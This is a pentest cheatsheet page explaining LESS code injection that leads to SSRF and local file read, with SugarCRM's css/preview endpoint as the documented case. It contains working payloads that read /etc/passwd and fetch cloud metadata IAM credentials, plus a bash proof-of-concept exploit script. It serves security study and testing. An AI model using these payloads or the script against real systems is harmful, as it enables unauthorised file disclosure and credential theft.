daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

less-code-injection.md (3700B)


      1 ---
      2 title: "LESS Code Injection leading to SSRF & Local File Read"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/xs-search/css-injection/less-code-injection.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xs-search/css-injection/less-code-injection.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # LESS Code Injection leading to SSRF & Local File Read
     14 
     15 LESS is a CSS preprocessor with variables, mixins, functions, and `@import`. With the `(inline)` import option, the compiler copies the imported resource into CSS output without processing it as LESS. Server-side fetching, accepted URL schemes, and local-file access depend on the compiler implementation and options.<sup>[[4]](#references)</sup>
     16 
     17 When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**.  By abusing `@import (inline)` the attacker can force the server to retrieve:
     18 
     19 * Local files via the `file://` protocol (information disclosure / Local File Inclusion).
     20 * Remote resources on internal networks or cloud metadata services (SSRF).
     21 
     22 This technique affected the SugarCRM `/rest/v10/css/preview` endpoint in the version ranges documented by SA-2024-059; do not reduce the advisory's edition-specific ranges to a universal “≤ 14.0.0” claim.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
     23 
     24 ### Exploitation
     25 
     26 1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).<sup>[[1]](#references)</sup>
     27 2. Close the current statement and inject new directives.  The most common primitives are:
     28    * `;`  – terminates the previous declaration.
     29    * `}`  – closes the previous block (if required).
     30 3. Use `@import (inline) '<URL>';` to read arbitrary resources.
     31 4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
     32 
     33 #### Local File Read
     34 
     35 ```text
     36 1; @import (inline) 'file:///etc/passwd';
     37 @import (inline) 'data:text/plain,@@END@@'; //
     38 ```
     39 
     40 The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
     41 
     42 #### SSRF – Cloud Metadata
     43 
     44 ```text
     45 1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
     46 @import (inline) 'data:text/plain,@@END@@'; //
     47 ```
     48 
     49 #### Automated PoC (SugarCRM example)
     50 
     51 ```bash
     52 #!/usr/bin/env bash
     53 # Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
     54 
     55 TARGET="$1"        # Base URL of SugarCRM instance
     56 RESOURCE="$2"      # file:// path or URL to fetch
     57 
     58 INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
     59 
     60 curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
     61   sed -n 's/.*@@END@@\(.*\)/\1/p'
     62 ```
     63 
     64 ### Real-World Cases
     65 
     66 | Product | Vulnerable Endpoint | Impact |
     67 |---------|--------------------|--------|
     68 | SugarCRM (affected ranges in SA-2024-059) | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF and local file read |
     69 
     70 ## References
     71 
     72 - [1] [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
     73 - [2] [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
     74 - [3] [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
     75 - [4] [Less documentation — Import At-Rules](https://lesscss.org/features/#import-atrules-feature)